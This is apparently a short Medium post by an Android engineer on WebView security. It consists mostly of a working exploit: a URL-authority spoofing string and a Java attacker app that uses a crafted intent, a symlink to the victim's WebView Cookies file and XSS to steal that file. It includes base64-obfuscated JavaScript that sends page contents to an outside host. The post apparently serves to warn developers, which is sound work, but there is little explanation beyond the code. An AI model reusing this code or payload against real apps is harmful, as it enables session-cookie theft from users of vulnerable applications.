Verify URI by Authority, not Host

String url = “http://fack.website\\\\@tw.buy.yahoo.com/fashionbuy";

Theft of file with cookies via XSS

private String setCookieFile;
private String symlinkFile;

private static final String VICTIM_PACKAGE = ...;
private static final String VICTIM_ACTIVITY = ...;

protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);

setCookieFile = getRoot() + "/setCookie.html";
symlinkFile = getRoot() + "/symlink.html";

payloadFile();
symlink();
grantReadRecursive(new File(getRoot()));

Intent intent = new Intent();
intent.setClassName(VICTIM_PACKAGE, VICTIM_ACTIVITY);
// If hacker found a way let how your activity handle intend to open in-app webview
intent.putExtra("intent_content", "{\"content\":{\"uri\":\"file:\\/\\/{your valid website}" + setCookieFile.replace("/", "\\/") + "\"}}");
startActivity(intent);
}

void payloadFile() {
try {
PrintWriter writer = new PrintWriter(new File(setCookieFile));
writer.println("<h1>this is theft</h1><script>"); writer.println("eval(atob('ZG9jdW1lbnQuY29va2llID0gInggPSA8aW1nIHNyYz1cInhcIiBvbmVycm9yPVwiZXZhbChhdG9iKCdkbUZ5SUdsdFp5QTlJR1J2WTNWdFpXNTBMbU55WldGMFpVVnNaVzFsYm5Rb0ltbHRaeUlwT3dwcGJXY3VjM0pqSUQwZ0ltaDBkSEE2THk5aVlYTmxOalF1Y25VdmQyOTNMbXB3Wno5NmFHczlJaUFySUdWdVkyOWtaVlZTU1VOdmJYQnZibVZ1ZENoa2IyTjFiV1Z1ZEM1blpYUkZiR1Z0Wlc1MGMwSjVWR0ZuVG1GdFpTZ2lhSFJ0YkNJcFd6QmRMbWx1Ym1WeVNGUk5UQ2s3JykpXCI+Ijs='));");
writer.println("setTimeout(\"location.href='file://{valid url}" + symlinkFile + "'\", 45000);");
writer.println("</script>");
writer.close();
}
catch (Exception e) {
throw new RuntimeException(e);
}
}

void symlink() {
new File(symlinkFile).delete();
try {
Runtime.getRuntime().exec("ln -s /data/data/" + VICTIM_PACKAGE + "/app_webview/Cookies " + symlinkFile).waitFor();
}
catch (Exception e) {
throw new RuntimeException(e);
}
}

String getRoot() {
return "/data/data/" + getPackageName();
}

private void grantReadRecursive(File dist) {
dist.setReadable(true, false);
if(dist.isDirectory()) {
for(File child : dist.listFiles()) {
grantReadRecursive(child);
}
}
}

--

--

--

Lead Android & iOS Mobile Engineer at Yahoo (Verizon Media) Taiwan https://www.linkedin.com/in/hanruyeh/

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

AppConfig Flavor For Flutter

Getting started with CSS

Immutability in Java

A cup of coffee

Rapid Miner -Data Engineering Master certificate

Drop Metaverse DROPP GG

Build a simple dashboard using Power BI

Cardano Ecosystem News — July 2021 — from Cardano 360 Update

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Bram Yeh

Bram Yeh

Lead Android & iOS Mobile Engineer at Yahoo (Verizon Media) Taiwan https://www.linkedin.com/in/hanruyeh/

More from Medium

Advanced build Toolkit (Gradle)

Google I/O 22: Android Keynote

Resolving HAXM Issue in Android Studio for Windows

Quick Note: Custom WebView Class Won’t Display Virtual Keyboard After Kotlinized